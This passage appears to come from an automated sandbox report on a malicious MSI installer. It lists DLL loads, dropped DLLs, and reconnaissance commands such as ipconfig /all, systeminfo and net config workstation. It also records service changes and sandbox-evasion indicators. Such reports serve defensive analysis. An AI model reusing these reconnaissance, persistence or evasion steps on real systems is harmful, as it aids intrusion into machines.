Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,

5_2_00000001800033E0

Source: Update_cd47bedf.dll.5.dr	Static PE information: real checksum: 0xd8785 should be: 0xe745c
Source: 360total.dll.1.dr	Static PE information: real checksum: 0xd8785 should be: 0xe745c

Source: 360total.dll.1.dr	Static PE information: section name: wsgi2
Source: Update_cd47bedf.dll.5.dr	Static PE information: section name: wsgi2

Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005A323C push ecx; ret	3_2_005A324F
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180010451 push rcx; ret	5_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001045A push rcx; ret	5_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001801758FC push rsp; ret	5_2_00000001801758FD
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180175CDE push 2027C70Fh; ret	5_2_0000000180175CE5

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI181.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\Windows\System32\rundll32.exe	File created: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI54.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC4.tmp	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFFD6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI181.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI54.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFFD6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI181.tmp	Jump to dropped file

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

5_2_0000000180049AEC

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

5_2_0000000180062148

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\rundll32.exe

Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,

5_2_00000001800655A8

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180049AEC

5_2_0000000180049AEC

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Windows\System32\rundll32.exe

Code function: 6_3_00000180103176DC rdtsc

6_3_00000180103176DC

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	5_2_00000235B5CE68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,	5_2_00000235B5CF0EF8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	5_2_00000235B5CE7FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	7_2_000001EF532B68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	7_2_000001EF532B7FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,	7_2_000001EF532C0EF8

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 737	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 663	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8599	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI54.tmp	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll	Jump to dropped file
